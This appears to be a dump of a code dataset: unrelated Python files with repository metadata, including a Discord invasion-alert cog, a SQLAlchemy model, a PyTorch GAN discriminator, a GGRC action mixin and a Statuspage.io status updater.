                            or self.alert_dict[user][0].lower() in v['defenderReward']['asString'].lower():
                        user_inv.append(v)
                        node = v['node']
                        atk_reward = v['attackerReward']['asString'] or 'N/A'
                        def_reward = v['defenderReward']['asString'] or 'N/A'
                        attackers = v['attackingFaction']
                        defenders = v['defendingFaction']
                        info += node + ': \n' + attackers + f' [{atk_reward}]' + ' vs ' + defenders + f' [{def_reward}]\n'
                if info != '':
                    embed.add_field(name=f'{key}', value=f'{info}', inline=False)
            # Check if need to notify user
            if len(self.alert_dict[user][1]) != len(user_inv):  # If lengths do not match, alert of update
                self.alert_dict[user][1] = user_inv.copy()
                await user.send(f'Invasions with {self.alert_dict[user][0].title()} reward has been updated!',
                                embed=embed)
            else:
                for i in range(len(self.alert_dict[user][1])):
                    if self.alert_dict[user][1][i]['node'] != user_inv[i]['node']:
                        self.alert_dict[user][1] = user_inv.copy()
                        await user.send(f'Invasions with {self.alert_dict[user][0].title()} reward has been updated!',
                                        embed=embed)


def setup(bot):
    bot.add_cog(Invasions(bot))
| 42.977778
| 122
| 0.54757
| 5,588
| 0.963116
| 0
| 0
| 2,489
| 0.42899
| 4,998
| 0.861427
| 2,006
| 0.345743
|
b17cbc82703ac9fc882cd99a409335fa53853226
| 226
|
py
|
Python
|
samples-python/datalayer.calc/calculations/__init__.py
|
bracoe/ctrlx-automation-sdk
|
6b2e61e146c557488125baf941e4d64c6fa6d0fb
|
[
"MIT"
] | 16
|
2021-08-23T13:07:12.000Z
|
2022-02-21T13:29:21.000Z
|
samples-python/datalayer.calc/calculations/__init__.py
|
bracoe/ctrlx-automation-sdk
|
6b2e61e146c557488125baf941e4d64c6fa6d0fb
|
[
"MIT"
] | null | null | null |
samples-python/datalayer.calc/calculations/__init__.py
|
bracoe/ctrlx-automation-sdk
|
6b2e61e146c557488125baf941e4d64c6fa6d0fb
|
[
"MIT"
] | 10
|
2021-09-29T09:58:33.000Z
|
2022-01-13T07:20:00.000Z
|
__version__ = '2.0.0'
__description__ = 'Sample for calculations with data from the ctrlX Data Layer'
__author__ = 'Fantastic Python Developers'
__licence__ = 'MIT License'
__copyright__ = 'Copyright (c) 2021 Bosch Rexroth AG'
| 45.2
| 79
| 0.778761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 147
| 0.650442
|
b17e60242b5d5da25f1f85bc29429ee00fd48f19
| 320
|
py
|
Python
|
sqlalchemist/models/definitions.py
|
pmav99/sqlalchemist
|
af784f8d6e7c6c7298ad273c481af748cc0332d5
|
[
"BSD-3-Clause"
] | 7
|
2019-09-06T21:58:42.000Z
|
2021-12-02T21:48:35.000Z
|
sqlalchemist/models/definitions.py
|
pmav99/sqlalchemy_playground
|
af784f8d6e7c6c7298ad273c481af748cc0332d5
|
[
"BSD-3-Clause"
] | null | null | null |
sqlalchemist/models/definitions.py
|
pmav99/sqlalchemy_playground
|
af784f8d6e7c6c7298ad273c481af748cc0332d5
|
[
"BSD-3-Clause"
] | 1
|
2021-01-22T03:23:21.000Z
|
2021-01-22T03:23:21.000Z
|
import sqlalchemy as sa

from .meta import Base


class Person(Base):
    __tablename__ = "person"

    id = sa.Column(sa.Integer, primary_key=True)
    name = sa.Column(sa.String)
    date_of_birth = sa.Column(sa.Date)
    height = sa.Column(sa.Integer)
    weight = sa.Column(sa.Numeric)


__all__ = [
    "Person",
]
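# --- Editor's usage sketch (hedged; the engine URL is a placeholder) ---
# import sqlalchemy as sa
# from sqlalchemy.orm import Session
#
# engine = sa.create_engine("sqlite:///:memory:")
# Base.metadata.create_all(engine)  # emits CREATE TABLE person
# with Session(engine) as session:
#     session.add(Person(name="Ada", height=170))
#     session.commit()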
| 16.842105
| 48
| 0.6625
| 239
| 0.746875
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.05
|
b17eab4940677c2202b0aa8a880f82fca874b795
| 2,732
|
py
|
Python
|
examples/example_hello_world.py
|
clbarnes/figurefirst
|
ed38e246a96f28530bf663eb6920da1c3ccee610
|
[
"MIT"
] | 67
|
2016-06-03T20:37:56.000Z
|
2022-03-08T19:05:06.000Z
|
examples/example_hello_world.py
|
clbarnes/figurefirst
|
ed38e246a96f28530bf663eb6920da1c3ccee610
|
[
"MIT"
] | 56
|
2016-05-23T17:44:04.000Z
|
2021-11-18T19:23:52.000Z
|
examples/example_hello_world.py
|
clbarnes/figurefirst
|
ed38e246a96f28530bf663eb6920da1c3ccee610
|
[
"MIT"
] | 11
|
2017-07-13T14:25:08.000Z
|
2021-12-01T00:15:01.000Z
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
plt.ion()
from figurefirst import FigureLayout
layout = FigureLayout('example_hello_world_layout.svg')
layout.make_mplfigures()
d = np.array([[144, 57], [138, 57], [138, 59], [141, 61], [141, 82], [138, 84], [138, 85], [142, 85], [147, 85], [147, 84], [144, 82], [144, 57], [144, 57], [155, 57], [149, 57], [149, 59], [152, 61], [152, 82], [149, 84], [149, 85], [153, 85], [158, 85], [158, 84], [155, 82], [155, 57], [155, 57], [273, 57], [267, 57], [267, 59], [270, 61], [270, 82], [267, 84], [267, 85], [271, 85], [276, 85], [276, 84], [273, 82], [273, 57], [273, 57], [295, 57], [289, 57], [289, 59], [292, 61], [292, 70], [287, 67], [278, 76], [287, 85], [292, 83], [292, 85], [298, 85], [298, 84], [295, 81], [295, 57], [295, 57], [90, 57], [90, 59], [91, 59], [94, 61], [94, 82], [91, 84], [90, 84], [90, 85], [96, 85], [102, 85], [102, 84], [101, 84], [98, 82], [98, 71], [110, 71], [110, 82], [107, 84], [106, 84], [106, 85], [112, 85], [118, 85], [118, 84], [117, 84], [113, 82], [113, 61], [117, 59], [118, 59], [118, 57], [112, 58], [106, 57], [106, 59], [107, 59], [110, 61], [110, 70], [98, 70], [98, 61], [101, 59], [102, 59], [102, 57], [96, 58], [90, 57], [90, 57], [193, 57], [193, 59], [197, 60], [205, 85], [205, 86], [206, 85], [213, 65], [219, 85], [220, 86], [221, 85], [229, 61], [233, 59], [233, 57], [229, 58], [224, 57], [224, 59], [228, 61], [227, 62], [221, 80], [215, 60], [215, 60], [218, 59], [218, 57], [213, 58], [208, 57], [208, 59], [211, 60], [212, 63], [207, 80], [200, 60], [200, 60], [203, 59], [203, 57], [198, 58], [193, 57], [193, 57], [128, 67], [120, 76], [129, 85], [135, 80], [135, 80], [134, 80], [129, 84], [125, 82], [123, 76], [134, 76], [135, 75], [128, 67], [128, 67], [169, 67], [160, 76], [169, 85], [178, 76], [169, 67], [169, 67], [240, 67], [231, 76], [240, 85], [249, 76], [240, 67], [240, 67], [257, 67], [251, 68], [251, 69], [254, 71], [254, 82], [251, 84], [251, 85], [256, 85], [261, 85], [261, 84], [260, 84], [257, 82], [257, 75], [262, 68], [262, 68], [261, 70], [263, 71], [265, 70], [262, 67], [257, 71], [257, 67], [257, 67], [128, 68], [133, 75], [123, 75], [128, 68], [128, 68], [169, 68], [173, 70], [174, 76], [173, 81], [169, 84], [164, 82], [163, 76], [164, 70], [169, 68], [169, 68], [240, 68], [244, 70], [246, 76], [245, 81], [240, 84], [235, 82], [234, 76], [235, 70], [240, 68], [240, 68], [287, 68], [292, 70], [292, 72], [292, 80], [292, 82], [287, 84], [283, 82], [281, 76], [283, 71], [287, 68], [287, 68]])
ax = layout.axes['ax_name']['axis']
ax.plot(d[:,0], -d[:,1], lw=4)
layout.insert_figures('target_layer_name')
layout.write_svg('example_hello_world_output.svg')
| 143.789474
| 2,363
| 0.493411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 119
| 0.043558
|
b17fee2e7308f25f04ee5daea15a5c921b98ff99
| 2,009
|
py
|
Python
|
cifar_exps/metric/local_config.py
|
maestrojeong/Deep-Hash-Table-ICML18-
|
0c7efa230f950d5a2cd1928ac9f5d99f4276d2b5
|
[
"MIT"
] | 70
|
2018-06-03T04:19:13.000Z
|
2021-11-08T10:40:46.000Z
|
cifar_exps/metric/local_config.py
|
maestrojeong/Deep-Hash-Table-ICML18-
|
0c7efa230f950d5a2cd1928ac9f5d99f4276d2b5
|
[
"MIT"
] | null | null | null |
cifar_exps/metric/local_config.py
|
maestrojeong/Deep-Hash-Table-ICML18-
|
0c7efa230f950d5a2cd1928ac9f5d99f4276d2b5
|
[
"MIT"
] | 14
|
2018-06-03T16:34:55.000Z
|
2020-09-09T17:02:30.000Z
|
import sys
sys.path.append("../../configs")
# ../../configs
from path import EXP_PATH

import numpy as np

DECAY_PARAMS_DICT = \
    {
        'stair':
            {
                128: {
                    'a1': {'initial_lr': 1e-5, 'decay_steps': 50000, 'decay_rate': 0.3},
                    'a2': {'initial_lr': 3e-4, 'decay_steps': 50000, 'decay_rate': 0.3},
                    'a3': {'initial_lr': 1e-3, 'decay_steps': 50000, 'decay_rate': 0.3},
                    'a4': {'initial_lr': 3e-3, 'decay_steps': 50000, 'decay_rate': 0.3},
                    'a5': {'initial_lr': 1e-2, 'decay_steps': 50000, 'decay_rate': 0.3}
                }
            },
        'piecewise':
            {
                128: {
                    'a1': {'boundaries': [10000, 20000], 'values': [1e-4, 3e-5, 1e-5]},
                    'a2': {'boundaries': [10000, 20000], 'values': [3e-4, 1e-4, 3e-5]},
                    'a3': {'boundaries': [10000, 20000], 'values': [1e-3, 3e-4, 1e-4]},
                    'a4': {'boundaries': [10000, 20000], 'values': [3e-3, 1e-3, 3e-4]},
                    'a5': {'boundaries': [10000, 20000], 'values': [1e-2, 3e-3, 1e-3]},
                    'b1': {'boundaries': [20000, 35000], 'values': [1e-4, 3e-5, 1e-5]},
                    'b2': {'boundaries': [20000, 35000], 'values': [3e-4, 1e-4, 3e-5]},
                    'b3': {'boundaries': [20000, 35000], 'values': [1e-3, 3e-4, 1e-4]},
                    'b4': {'boundaries': [20000, 35000], 'values': [3e-3, 1e-3, 3e-4]},
                    'b5': {'boundaries': [20000, 35000], 'values': [1e-2, 3e-3, 1e-3]}
                }
            }
    }

ACTIVATE_K_SET = np.arange(1, 5)
K_SET = [1, 4, 16]
RESULT_DIR = EXP_PATH + "cifar_exps/"

# ========================PARAM============================#
DATASET = 'cifar'
GPU_ID = 0
BATCH_SIZE = 128
EPOCH = 300
NSCLASS = 16
# model
EMBED_M = 64
CONV_NAME = 'conv1'
# metric loss
LOSS_TYPE = 'triplet'
MARGIN_ALPHA = 0.3
LAMBDA = 0.003  # regularization for npair
# learning
DECAY_TYPE = 'stair'
DECAY_PARAM_TYPE = 'a3'
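# Editor's sketch (hedged): how these lookup tables are typically consumed.
# The composite key below reuses the module-level settings; the consuming
# training code is hypothetical.
#
# params = DECAY_PARAMS_DICT[DECAY_TYPE][BATCH_SIZE][DECAY_PARAM_TYPE]
# # => {'initial_lr': 1e-3, 'decay_steps': 50000, 'decay_rate': 0.3}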
| 36.527273
| 88
| 0.47337
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 654
| 0.325535
|
b18129f45c367129cdadaeeefa97748f7c44101b
| 1,133
|
py
|
Python
|
POO punto 2/ManagerUsers.py
|
nan0te/Python-Algorithm-And-DataStructure
|
7b7802b56d397c38f230f5efb687cedc6cc263f3
|
[
"MIT"
] | null | null | null |
POO punto 2/ManagerUsers.py
|
nan0te/Python-Algorithm-And-DataStructure
|
7b7802b56d397c38f230f5efb687cedc6cc263f3
|
[
"MIT"
] | null | null | null |
POO punto 2/ManagerUsers.py
|
nan0te/Python-Algorithm-And-DataStructure
|
7b7802b56d397c38f230f5efb687cedc6cc263f3
|
[
"MIT"
] | null | null | null |
from Profesional import Profesional
from Particular import Particular
from Comercial import Comercial


class ManagerUsers:
    userslist = []

    def addProfesional(self, name, address, baja, area, titulo):
        profesional = Profesional(name, address, baja, area, titulo)
        self.userslist.append(profesional)

    def addParticular(self, name, address, baja, dni, fechaNac):
        particular = Particular(name, address, baja, dni, fechaNac)
        self.userslist.append(particular)

    def addComercial(self, name, address, baja, rubro, cuilt):
        comercial = Comercial(name, address, baja, rubro, cuilt)
        self.userslist.append(comercial)

    def searchUser(self, name):
        for user in self.userslist:
            if name == user.getName():
                user.muestra()

    def imprimirUsuarios(self):
        for user in self.userslist:
            user.muestra()

    def deleteUser(self, name):
        # Bug fix: pop from the list that holds the users, not from the user
        # object, and stop iterating once the entry is removed.
        position = 0
        for user in self.userslist:
            if name == user.getName():
                self.userslist.pop(position)
                break
            position = position + 1
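# --- Editor's usage sketch (hedged; argument values are invented and the
# constructor signatures are taken from the add* methods above) ---
# manager = ManagerUsers()
# manager.addParticular("Ana", "Calle 1", False, "12345678", "1990-01-01")
# manager.imprimirUsuarios()   # prints every registered user via muestra()
# manager.deleteUser("Ana")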
| 28.325
| 68
| 0.620477
| 397
| 0.350397
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b1826d4965ab04b828a39c0aa6af7cd8e92a7f3e
| 10,419
|
py
|
Python
|
src/ggrc/models/mixins/with_action.py
|
MikalaiMikalalai/ggrc-core
|
f0f83b3638574bb64de474f3b70ed27436ca812a
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2019-01-12T23:46:00.000Z
|
2019-01-12T23:46:00.000Z
|
src/ggrc/models/mixins/with_action.py
|
MikalaiMikalalai/ggrc-core
|
f0f83b3638574bb64de474f3b70ed27436ca812a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/ggrc/models/mixins/with_action.py
|
MikalaiMikalalai/ggrc-core
|
f0f83b3638574bb64de474f3b70ed27436ca812a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2020 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Contains WithAction mixin.
A mixin for processing actions on an object in the scope of put request .
"""
from collections import namedtuple, defaultdict
import werkzeug.exceptions as wzg_exceptions
from ggrc import db
from ggrc.login import get_current_user
from ggrc.models.comment import Comment
from ggrc.models.document import Document
from ggrc.models.evidence import Evidence
from ggrc.models.snapshot import Snapshot
from ggrc.models.exceptions import ValidationError
from ggrc.models.reflection import ApiAttributes
from ggrc.models.reflection import Attribute
from ggrc.models.relationship import Relationship
from ggrc.rbac import permissions
class WithAction(object):
"""Mixin for add/remove map/unmap actions processing"""
_api_attrs = ApiAttributes(
Attribute("actions", create=False, update=True, read=False)
)
_operation_order = [
"add_related",
"remove_related",
]
_object_map = {
"Document": Document,
"Evidence": Evidence,
"Comment": Comment,
"Snapshot": Snapshot,
}
_actions = None
_added = None # collect added objects for signals sending
_deleted = None # collect deleted objects fro signals sending
_relationships_map = None
def actions(self, value):
"""Save actions for further processing"""
if value:
self._actions = value.get("actions")
def _validate_actions(self):
"""Validate operation types"""
invalid_actions = ",".join(set(self._actions) - set(self._operation_order))
if invalid_actions:
raise ValueError("Invalid actions found: {}".format(invalid_actions))
def _build_relationships_map(self):
"""Build relationships map"""
self._relationships_map = {
(rel.destination_type, rel.destination_id): rel
for rel in self.related_destinations
}
self._relationships_map.update({
(rel.source_type, rel.source_id): rel
for rel in self.related_sources
})
def _process_operation(self, operation):
"""Process operation actions"""
for action in self._actions[operation]:
# get object class
obj_type = action.get("type")
if not obj_type:
raise ValidationError('type is not defined')
obj_class = self._object_map.get(obj_type)
if not obj_class:
raise ValueError('Invalid action type: {type}'.format(type=obj_type))
# get handler class
action_type = '{type}Action'.format(type=obj_type)
action_class = getattr(self, action_type, None)
if not action_class:
raise ValueError('Invalid action type: {type}'.format(type=obj_type))
# process action
# pylint: disable=not-callable
added, deleted = getattr(action_class(), operation)(self, action)
# collect added/deleted objects
self._added.extend(added)
self._deleted.extend(deleted)
def process_actions(self):
"""Process actions"""
if not self._actions:
return {}, []
self._validate_actions()
self._added = []
self._deleted = []
for operation in self._operation_order:
if operation not in self._actions:
continue
if not self._actions[operation]:
continue
self._build_relationships_map()
self._process_operation(operation)
# collect added/deleted objects for signals sending
added = defaultdict(list)
for obj in self._added:
added[obj.__class__].append(obj)
return added, self._deleted
class BaseAction(object):
"""Base action"""
AddRelated = namedtuple("AddRelated", ["id", "type"])
MapRelated = namedtuple("MapRelated", ["id", "type"])
RemoveRelated = namedtuple("RemoveRelated", ["id", "type"])
def add_related(self, parent, _action):
"""Add/map object to parent"""
added = []
if _action.get("id"):
action = self._validate(_action, self.MapRelated)
obj = self._get(action)
else:
action = self._validate(_action, self.AddRelated)
obj = self._create(parent, action)
added.append(obj)
from ggrc.models.hooks.common import check_mapping_permissions
check_mapping_permissions(parent, obj)
rel = Relationship(source=parent,
destination=obj,
context=parent.context)
added.append(rel)
return added, []
@staticmethod
def _validate(_action, ntuple):
try:
return ntuple(**_action)
except TypeError:
# According to documentation _fields is not private property
# but public, '_' added to prevent conflicts with tuple field names
# pylint: disable=protected-access
missing_fields = set(ntuple._fields) - set(_action)
raise ValidationError(
"Fields {} are missing for action: {!r}".format(
", ".join(missing_fields), _action
)
)
# pylint: disable=unused-argument,no-self-use
def _create(self, parent, action):
raise ValidationError("Can't create {type} object".format(
type=action.type))
def _get(self, action):
"""Get object specified in action"""
if not action.id:
raise ValueError("id is not defined")
# pylint: disable=protected-access
obj_class = WithAction._object_map[action.type]
obj = obj_class.query.get(action.id)
if not obj:
raise ValueError(
'Object not found: {type} {id}'.format(type=action.type,
id=action.id))
return obj
def remove_related(self, parent, _action):
"""Remove relationship"""
action = self._validate(_action, self.RemoveRelated)
deleted = []
obj = self._get(action)
# pylint: disable=protected-access
rel = parent._relationships_map.get((obj.type, obj.id))
if rel:
db.session.delete(rel)
deleted.append(rel)
return [], deleted
def _check_related_permissions(self, obj):
"""Check permissions before deleting related Evidence or Document"""
if not permissions.is_allowed_delete(
obj.type, obj.id, obj.context_id) \
and not permissions.has_conditions("delete", obj.type):
raise wzg_exceptions.Forbidden()
if not permissions.is_allowed_delete_for(obj):
raise wzg_exceptions.Forbidden()
class DocumentAction(BaseAction):
"""Document action"""
AddRelated = namedtuple("AddRelated", ["id",
"type",
"kind",
"link",
"title"])
@staticmethod
def _validate_parent(parent):
"""Validates if paren in allowed parents"""
from ggrc.models.object_document import Documentable
if not isinstance(parent, Documentable):
raise ValueError('Type "{}" is not Documentable.'.format(parent.type))
def _create(self, parent, action):
self._validate_parent(parent)
obj = Document(link=action.link,
title=action.title,
kind=action.kind,
context=parent.context)
return obj
def remove_related(self, parent, _action):
"""Remove relationship"""
action = self._validate(_action, self.RemoveRelated)
deleted = []
obj = self._get(action)
# pylint: disable=protected-access
rel = parent._relationships_map.get((obj.type, obj.id))
self._check_related_permissions(obj)
if rel:
db.session.delete(rel)
deleted.append(rel)
return [], deleted
class EvidenceAction(BaseAction):
"""Evidence action"""
AddRelatedTuple = namedtuple("AddRelated", ["id",
"type",
"kind",
"link",
"title",
"source_gdrive_id"])
def add_related_wrapper(self, id, type, kind, link,
title, source_gdrive_id=''):
"""Used to add 'default' value to the named tuple
In case of Evidence.FILE source_gdrive_id is mandatory
"""
return self.AddRelatedTuple(id, type, kind, link,
title, source_gdrive_id)
AddRelated = add_related_wrapper
AddRelated._fields = AddRelatedTuple._fields
def _create(self, parent, action):
obj = Evidence(link=action.link,
title=action.title,
kind=action.kind,
source_gdrive_id=action.source_gdrive_id,
context=parent.context)
return obj
def remove_related(self, parent, _action):
"""Remove relationship"""
action = self._validate(_action, self.RemoveRelated)
deleted = []
obj = self._get(action)
# pylint: disable=protected-access
rel = parent._relationships_map.get((obj.type, obj.id))
self._check_related_permissions(obj)
if rel:
db.session.delete(rel)
deleted.append(rel)
obj.status = Evidence.DEPRECATED
return [], deleted
class CommentAction(BaseAction):
"""Comment action"""
AddRelated = namedtuple("AddRelated", ["id",
"type",
"description",
"custom_attribute_definition_id"])
def _create(self, parent, action):
# get assignee type
current_user = get_current_user()
assignee_types = parent.assignees.get(current_user, [])
assignee_type = ",".join(assignee_types) or None
# create object
cad_id = action.custom_attribute_definition_id
if not cad_id:
obj = Comment(description=action.description,
assignee_type=assignee_type,
context=parent.context)
else:
obj = Comment(description=action.description,
custom_attribute_definition_id=cad_id,
assignee_type=assignee_type,
context=parent.context)
return obj
class SnapshotAction(BaseAction):
"""Snapshot action"""
| 33.501608
| 79
| 0.613783
| 9,644
| 0.925617
| 0
| 0
| 814
| 0.078126
| 0
| 0
| 2,149
| 0.206258
|
b183550bc53fd30c394fa716585596aa04c10f32
| 99
|
py
|
Python
|
tests/__init__.py
|
Fokko/example-library-python
|
b20b69c6dae93c32cd3d2c86a644abbf6b85199b
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
Fokko/example-library-python
|
b20b69c6dae93c32cd3d2c86a644abbf6b85199b
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
Fokko/example-library-python
|
b20b69c6dae93c32cd3d2c86a644abbf6b85199b
|
[
"Apache-2.0"
] | null | null | null |
import sys, os
path = os.path.dirname(__file__)
if path not in sys.path:
    sys.path.append(path)
| 19.8
| 32
| 0.717172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b184dd55b715329d1a0d130a5cfdba08a4a14ccb
| 3,457
|
py
|
Python
|
GAN_discriminator.py
|
SEE-MOF/Generation_of_atmospheric_cloud_fields_using_GANs
|
6dce1447e140f5724638ac576bbf913af4e8a0e6
|
[
"MIT"
] | null | null | null |
GAN_discriminator.py
|
SEE-MOF/Generation_of_atmospheric_cloud_fields_using_GANs
|
6dce1447e140f5724638ac576bbf913af4e8a0e6
|
[
"MIT"
] | null | null | null |
GAN_discriminator.py
|
SEE-MOF/Generation_of_atmospheric_cloud_fields_using_GANs
|
6dce1447e140f5724638ac576bbf913af4e8a0e6
|
[
"MIT"
] | 1
|
2020-12-11T15:03:36.000Z
|
2020-12-11T15:03:36.000Z
|
import torch


class GAN_discriminator(torch.nn.Module):
    def __init__(self, H):
        # for GAN
        #   H = [5, 256, 128, 128, 5, 1, 64, 128, 256, 256, 4096, 1]
        # for CGAN
        #   H = [8, 256, 128, 64, 8, 9, 64, 128, 256, 256, 4096, 1]
        super(GAN_discriminator, self).__init__()
        # region
        self.upsample0 = torch.nn.ConvTranspose2d(H[0], H[0], (4, 1), stride=(4, 1))
        self.convolution0 = torch.nn.Conv2d(H[0], H[1], (5, 3), padding=(2, 1))
        # relu
        self.batchNorm0 = torch.nn.BatchNorm2d(H[1])
        self.upsample1 = torch.nn.ConvTranspose2d(H[1], H[1], (4, 1), stride=(4, 1))
        self.convolution1 = torch.nn.Conv2d(H[1], H[2], (5, 3), padding=(2, 1))
        # relu
        self.batchNorm1 = torch.nn.BatchNorm2d(H[2])
        self.upsample2 = torch.nn.ConvTranspose2d(H[2], H[2], (2, 1), stride=(2, 1))
        self.convolution2 = torch.nn.Conv2d(H[2], H[3], (3, 3), padding=(1, 1))
        # relu
        self.batchNorm2 = torch.nn.BatchNorm2d(H[3])
        self.upsample3 = torch.nn.ConvTranspose2d(H[3], H[3], (2, 1), stride=(2, 1))
        self.convolution3 = torch.nn.Conv2d(H[3], H[4], (3, 3), padding=(1, 1))
        # relu
        self.batchNorm3 = torch.nn.BatchNorm2d(H[4])
        # endregion
        # concatenate
        self.convolution5 = torch.nn.Conv2d(H[5], H[6], (3, 3), stride=(2, 2), padding=(1, 1))
        # relu
        self.convolution6 = torch.nn.Conv2d(H[6], H[7], (3, 3), stride=(2, 2), padding=(1, 1))
        # relu
        self.convolution7 = torch.nn.Conv2d(H[7], H[8], (3, 3), stride=(2, 2), padding=(1, 1))
        # relu
        self.convolution8 = torch.nn.Conv2d(H[8], H[9], (3, 3), stride=(2, 2), padding=(1, 1))
        # relu
        # flatten
        self.dense9 = torch.nn.Linear(H[10], H[11])
        self.sigmoid9 = torch.nn.Sigmoid()

    def forward(self, x, scene):
        # region
        # `x is not None` instead of the original `x != None`: comparing a
        # tensor to None with `!=` is unidiomatic and can misbehave.
        if x is not None:
            h_upsample0 = self.upsample0(x)
            h_conv0 = self.convolution0(h_upsample0)
            h_relu0 = torch.nn.functional.leaky_relu(h_conv0, 0.2)
            h_batch0 = self.batchNorm0(h_relu0)
            h_upsample1 = self.upsample1(h_batch0)
            h_conv1 = self.convolution1(h_upsample1)
            h_relu1 = torch.nn.functional.leaky_relu(h_conv1, 0.2)
            h_batch1 = self.batchNorm1(h_relu1)
            h_upsample2 = self.upsample2(h_batch1)
            h_conv2 = self.convolution2(h_upsample2)
            h_relu2 = torch.nn.functional.leaky_relu(h_conv2, 0.2)
            h_batch2 = self.batchNorm2(h_relu2)
            h_upsample3 = self.upsample3(h_batch2)
            h_conv3 = self.convolution3(h_upsample3)
            h_relu3 = torch.nn.functional.leaky_relu(h_conv3, 0.2)
            h_batch3 = self.batchNorm3(h_relu3)
            # endregion
            h_conc4 = torch.cat((h_batch3, scene), 1)
        else:
            h_conc4 = scene
        h_conv5 = self.convolution5(h_conc4)
        h_relu5 = torch.nn.functional.leaky_relu(h_conv5, 0.2)
        h_conv6 = self.convolution6(h_relu5)
        h_relu6 = torch.nn.functional.leaky_relu(h_conv6, 0.2)
        h_conv7 = self.convolution7(h_relu6)
        h_relu7 = torch.nn.functional.leaky_relu(h_conv7, 0.2)
        h_conv8 = self.convolution8(h_relu7)
        h_relu8 = torch.nn.functional.leaky_relu(h_conv8, 0.2)
        h_flat9 = h_relu8.view(len(scene), -1)
        h_dense9 = self.dense9(h_flat9)
        h_out = self.sigmoid9(h_dense9)
        return h_out
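# --- Editor's smoke test (hedged): H is the CGAN config quoted in __init__;
# the input shapes are inferred from the transpose/convolution strides and
# the 4096-wide dense layer, and may differ from the authors' data. ---
# H = [8, 256, 128, 64, 8, 9, 64, 128, 256, 256, 4096, 1]
# disc = GAN_discriminator(H)
# x = torch.randn(2, 8, 1, 64)       # height 1 -> 64 via the 4,4,2,2 upsamples
# scene = torch.randn(2, 1, 64, 64)  # 64x64 scene; 256*4*4 = 4096 after 4 stride-2 convs
# out = disc(x, scene)               # -> (2, 1) sigmoid scores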
| 37.576087
| 92
| 0.582586
| 3,443
| 0.99595
| 0
| 0
| 0
| 0
| 0
| 0
| 229
| 0.066242
|
b1867ef42ce297b26321e0a3ab432ed29359ffca
| 7,770
|
py
|
Python
|
statuspage_io.py
|
spyder007/pi-monitoring
|
fab660adcf6ed89a591a6ed2060d653369843e6e
|
[
"MIT"
] | null | null | null |
statuspage_io.py
|
spyder007/pi-monitoring
|
fab660adcf6ed89a591a6ed2060d653369843e6e
|
[
"MIT"
] | null | null | null |
statuspage_io.py
|
spyder007/pi-monitoring
|
fab660adcf6ed89a591a6ed2060d653369843e6e
|
[
"MIT"
] | null | null | null |
import logging

import statuspage_io_client
import configuration
from enums import OpLevel

logger = logging.getLogger(__name__)


class Incident:
    """Incident Class

    This class represents the details about a Statuspage.io incident

    Attributes:
        name: The incident name.
        description: The incident description.
    """

    name: str = "Incident Name"
    description: str = "Incident Description"


class IncidentResult:
    """IncidentResult Class

    This class represents information about incidents created or resolved as part of a status change

    Attributes:
        incidentCreated: True if an incident was created, false otherwise.
        incidentResolved: True if an incident was resolved, false otherwise.
    """

    incidentCreated: bool = False
    incidentResolved: bool = False
    incident: Incident

    def __init__(self):
        self.incidentCreated = False
        self.incidentResolved = False
        self.incident = Incident()


class StatusResult:
    """StatusResult Class

    This class represents information about actions taken during a check and update.

    Attributes:
        statusChanged: True if the status has changed from the previous check, false otherwise.
        incidentResult: An instance of [IncidentResult][statuspage_io.IncidentResult].
    """

    statusChanged: bool = False
    incidentResult: IncidentResult = IncidentResult()

    def __init__(self):
        self.incidentResult = IncidentResult()


class StatusPageOperator:
    """StatusPageOperator Class

    This class performs the Statuspage.io operations used during a check and update.

    Attributes:
        config: An instance of [StatusPageSettings][configuration.StatusPageSettings] which contains settings for Statuspage.io communication
        client: An instance of [StatusPageClient][statuspage_io_client.StatusPageClient], built from the configuration values provided.
    """

    config: configuration.StatusPageSettings = configuration.StatusPageSettings()
    client: statuspage_io_client.StatusPageClient

    def __init__(self, statusPageConfig: configuration.StatusPageSettings):
        """Constructor

        Initialize the instance using the provided [StatusPageSettings][configuration.StatusPageSettings].
        """
        self.config = statusPageConfig
        self.client = statuspage_io_client.StatusPageClient(
            self.config.apiKey, self.config.pageId)

    def IsConfigured(self) -> bool:
        """Validate configuration data

        Returns:
            True if the operator has a valid configuration, False otherwise.
        """
        return self.config.apiKey != ""

    def UpdateComponentStatus(self, componentId: str, opLevel: OpLevel, incidentDetails: Incident = {}) -> StatusResult:
        """Update Component Status

        Using the provided OpLevel, determine the component's statuspage.io status.

        If the incoming `opLevel` is [Operational][enums.OpLevel] and the statuspage.io status is not, the component's status will be changed to `operational`, and any open incidents for that component will be resolved.

        If the incoming `opLevel` is any other value and the statuspage.io status is operational, the component's status will be changed to `major_outage` and an incident will be created using the provided `incidentDetails`

        Args:
            componentId: The component ID to check
            opLevel: The current OpLevel for the provided component
            incidentDetails: An instance of [Incident][statuspage_io.Incident] which has the details of the incident to be created, if necessary.

        Returns:
            An instance of [StatusResult][statuspage_io.StatusResult]
        """
        if opLevel == OpLevel.Operational:
            componentStatus = "operational"
        else:
            componentStatus = "major_outage"

        if (componentStatus not in self.client.component_status_list):
            raise ValueError(str.format(
                "Invalid status '{0}'. Valid values are {1}", componentStatus, self.client.component_status_list))

        result = StatusResult()
        component = self.client.getComponent(componentId)
        if (component.status != componentStatus):
            result.statusChanged = True
            logger.info("Changing status from %s to %s",
                        component.status, componentStatus)
            self._updateComponentStatus(componentId, componentStatus)
            result.incidentResult = self._processIncidentOnStatusChange(
                componentId, componentStatus, incidentDetails)
        return result

    def _updateComponentStatus(self, componentId, newComponentStatus):
        if (newComponentStatus not in self.client.component_status_list):
            raise ValueError(str.format(
                "Invalid status '{0}'. Valid values are {1}", newComponentStatus, self.client.component_status_list))

        logger.debug("Setting component status to %s: %s",
                     newComponentStatus, componentId)
        payload = {"component": {"status": newComponentStatus}}
